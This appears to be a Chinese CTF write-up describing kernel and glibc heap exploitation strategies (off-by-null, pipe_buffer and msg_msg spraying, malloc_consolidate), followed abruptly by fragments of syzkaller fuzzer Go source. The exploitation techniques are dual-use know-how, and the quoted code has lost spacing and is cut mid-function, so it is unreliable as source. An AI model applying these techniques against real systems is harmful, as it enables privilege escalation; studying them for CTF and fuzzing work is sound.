其实很简单就是一个简单版的off by null。但是我犯蠢了,在堆喷pipe_buffer时计算错误导致堆喷失败以至于在开始放弃了使用此方法,转而使用msg_msg形成双向链表造成UAF,可惜的是此方法因为off by null的限制使得其申请的堆块应该是从kmalloc-192或以下申请,所以很多可以堆喷来写入的结构体无法使用,如果继续使用msg_msgseg结构体来实现任意写也会因为其存在一个next指针导致无法free。最后这道题依旧是通过构造多级管道解出。
这里重点提一下那一道堆题(做完内核凌晨四点了,这道题没做)。简单描述一下漏洞,首先其edit函数中存在off by null,然后还可以在create函数中一直申请堆块,不过这里限制大小为 0~0x78 ,所有的堆块范围都在fastbin内。然后估摸着这题的利用方法应该和top chunk有关,但是仔细看了一下house of force发现条件并不满足,在比赛快结束时看了一下源码发现了以往不知道的机制。
/* When we are using atomic ops to free fast chunks we can get here for all block sizes. */ elseif (atomic_load_relaxed (&av->have_fastchunks)) { malloc_consolidate (av); /* restore original bin index */ if (in_smallbin_range (nb)) idx = smallbin_index (nb); else idx = largebin_index (nb); }
staticvoidmalloc_consolidate(mstate av) { mfastbinptr* fb; /* current fastbin being consolidated */ mfastbinptr* maxfb; /* last fastbin (for loop control) */ mchunkptr p; /* current chunk being consolidated */ mchunkptr nextp; /* next chunk to consolidate */ mchunkptr unsorted_bin; /* bin header */ mchunkptr first_unsorted; /* chunk to link to */
/* These have same use as in free() */ mchunkptr nextchunk; INTERNAL_SIZE_T size; INTERNAL_SIZE_T nextsize; INTERNAL_SIZE_T prevsize; int nextinuse;
/* Remove each chunk from fast bin and consolidate it, placing it then in unsorted bin. Among other reasons for doing this, placing in unsorted bin avoids needing to calculate actual bins until malloc is sure that chunks aren't immediately going to be reused anyway. */
maxfb = &fastbin (av, NFASTBINS - 1); fb = &fastbin (av, 0); do { p = atomic_exchange_acq (fb, NULL); if (p != 0) { do { { if (__glibc_unlikely (misaligned_chunk (p))) malloc_printerr ("malloc_consolidate(): " "unaligned fastbin chunk detected");
// Pool represents a set of test machines (VMs, physical devices, etc) of particular type. type Pool interface { // Count returns total number of VMs in the pool. Count() int
// Create creates and boots a new VM instance. Create(workdir string, index int) (Instance, error) }
type Report struct { // Title contains a representative description of the first oops. Title string // Alternative titles, used for better deduplication. // If two crashes have a non-empty intersection of Title/AltTitles, they are considered the same bug. AltTitles []string // Bug type (e.g. hang, memory leak, etc). Type Type // The indicative function name. Frame string // Report contains whole oops text. Report []byte // Output contains whole raw console output as passed to Reporter.Parse. Output []byte // StartPos/EndPos denote region of output with oops message(s). StartPos int EndPos int // SkipPos is position in output where parsing for the next report should start. SkipPos int // Suppressed indicates whether the report should not be reported to user. Suppressed bool // Corrupted indicates whether the report is truncated of corrupted in some other way. Corrupted bool // CorruptedReason contains reason why the report is marked as corrupted. CorruptedReason string // Recipients is a list of RecipientInfo with Email, Display Name, and type. Recipients vcs.Recipients // GuiltyFile is the source file that we think is to blame for the crash (filled in by Symbolize). GuiltyFile string // reportPrefixLen is length of additional prefix lines that we added before actual crash report. reportPrefixLen int // symbolized is set if the report is symbolized. symbolized bool }
mu sync.Mutex phase int targetEnabledSyscalls map[*prog.Syscall]bool
candidates []rpctype.Candidate // untriaged inputs from corpus and hub disabledHashes map[string]struct{} corpus map[string]CorpusItem seeds [][]byte newRepros [][]byte lastMinCorpus int memoryLeakFrames map[string]bool dataRaceFrames map[string]bool saturatedCalls map[string]bool
var ( flagConfig = flag.String("config", "", "configuration file") flagDebug = flag.Bool("debug", false, "dump all VM output to console") flagBench = flag.String("bench", "", "write execution statistics into this file periodically") )
func(mgr *Manager)runRepro(crash *Crash, vmIndexes []int, putInstances func(...int)) *ReproResult { features := mgr.checkResult.Features res, stats, err := repro.Run(crash.Output, mgr.cfg, features, mgr.reporter, mgr.vmPool, vmIndexes) ret := &ReproResult{ instances: vmIndexes, report0: crash.Report, repro: res, stats: stats, err: err, hub: crash.hub, } if err == nil && res != nil && mgr.cfg.StraceBin != "" { // We need only one instance to get strace output, release the rest. putInstances(vmIndexes[1:]...) defer putInstances(vmIndexes[0])
const straceAttempts = 2 for i := 1; i <= straceAttempts; i++ { strace := repro.RunStrace(res, mgr.cfg, mgr.reporter, mgr.vmPool, vmIndexes[0]) sameBug := strace.IsSameBug(res) log.Logf(0, "strace run attempt %d/%d for '%s': same bug %v, error %v", i, straceAttempts, res.Report.Title, sameBug, strace.Error) // We only want to save strace output if it resulted in the same bug. // Otherwise, it will be hard to reproduce on syzbot and will confuse users. if sameBug { ret.strace = strace break } } } else { putInstances(vmIndexes...) } return ret }
funcprepareCtx(crashLog []byte, cfg *mgrconfig.Config, features *host.Features, reporter *report.Reporter, VMs int)(*context, error) { if VMs == 0 { returnnil, fmt.Errorf("no VMs provided") } entries := cfg.Target.ParseLog(crashLog) iflen(entries) == 0 { returnnil, ErrNoPrograms } crashStart := len(crashLog) crashTitle, crashType := "", crash.UnknownType if rep := reporter.Parse(crashLog); rep != nil { crashStart = rep.StartPos crashTitle = rep.Title crashType = rep.Type } testTimeouts := []time.Duration{ 3 * cfg.Timeouts.Program, // to catch simpler crashes (i.e. no races and no hangs) 20 * cfg.Timeouts.Program, cfg.Timeouts.NoOutputRunningTime, // to catch "no output", races and hangs } switch { case crashTitle == "": crashTitle = "no output/lost connection" // Lost connection can be detected faster, // but theoretically if it's caused by a race it may need the largest timeout. // No output can only be reproduced with the max timeout. // As a compromise we use the smallest and the largest timeouts. testTimeouts = []time.Duration{testTimeouts[0], testTimeouts[2]} case crashType == crash.MemoryLeak: // Memory leaks can't be detected quickly because of expensive setup and scanning. testTimeouts = testTimeouts[1:] case crashType == crash.Hang: testTimeouts = testTimeouts[2:] } ctx := &context{ target: cfg.SysTarget, reporter: reporter, crashTitle: crashTitle, crashType: crashType, crashStart: crashStart, entries: entries, instances: make(chan *reproInstance, VMs), bootRequests: make(chanint, VMs), testTimeouts: testTimeouts, startOpts: createStartOptions(cfg, features, crashType), stats: new(Stats), timeouts: cfg.Timeouts, } ctx.reproLogf(0, "%v programs, %v VMs, timeouts %v", len(entries), VMs, testTimeouts) return ctx, nil }
func(ctx *context)repro()(*Result, error) { // Cut programs that were executed after crash. for i, ent := range ctx.entries { if ent.Start > ctx.crashStart { ctx.entries = ctx.entries[:i] break } }
// Extract last program on every proc. procs := make(map[int]int) for i, ent := range entries { procs[ent.Proc] = i } var indices []int for _, idx := range procs { indices = append(indices, idx) } sort.Ints(indices) var lastEntries []*prog.LogEntry for i := len(indices) - 1; i >= 0; i-- { lastEntries = append(lastEntries, entries[indices[i]]) } for _, timeout := range ctx.testTimeouts { // Execute each program separately to detect simple crashes caused by a single program. // Programs are executed in reverse order, usually the last program is the guilty one. res, err := ctx.extractProgSingle(lastEntries, timeout) if err != nil { returnnil, err } if res != nil { ctx.reproLogf(3, "found reproducer with %d syscalls", len(res.Prog.Calls)) return res, nil }
// Don't try bisecting if there's only one entry. iflen(entries) == 1 { continue }
// Execute all programs and bisect the log to find multiple guilty programs. res, err = ctx.extractProgBisect(entries, timeout) if err != nil { returnnil, err } if res != nil { ctx.reproLogf(3, "found reproducer with %d syscalls", len(res.Prog.Calls)) return res, nil } }
ctx.reproLogf(0, "failed to extract reproducer") returnnil, nil }
fwdAddr, err := inst.Forward(mgr.serv.port) if err != nil { returnnil, nil, fmt.Errorf("failed to setup port forwarding: %w", err) }
fuzzerBin, err := inst.Copy(mgr.cfg.FuzzerBin) if err != nil { returnnil, nil, fmt.Errorf("failed to copy binary: %w", err) }
// If ExecutorBin is provided, it means that syz-executor is already in the image, // so no need to copy it. executorBin := mgr.sysTarget.ExecutorBin if executorBin == "" { executorBin, err = inst.Copy(mgr.cfg.ExecutorBin) if err != nil { returnnil, nil, fmt.Errorf("failed to copy binary: %w", err) } }
type Instance interface { // Copy copies a hostSrc file into VM and returns file name in VM. Copy(hostSrc string) (string, error)
// Forward sets up forwarding from within VM to the given tcp // port on the host and returns the address to use in VM. Forward(port int) (string, error)
// Run runs cmd inside of the VM (think of ssh cmd). // outc receives combined cmd and kernel console output. // errc receives either command Wait return error or vmimpl.ErrTimeout. // Command is terminated after timeout. Send on the stop chan can be used to terminate it earlier. Run(timeout time.Duration, stop <-chanbool, command string) (outc <-chan []byte, errc <-chan error, err error)
// Diagnose retrieves additional debugging info from the VM // (e.g. by sending some sys-rq's or SIGABORT'ing a Go program). // // Optionally returns (some or all) of the info directly. If wait == true, // the caller must wait for the VM to output info directly to its log. // // rep describes the reason why Diagnose was called. Diagnose(rep *report.Report) (diagnosis []byte, wait bool)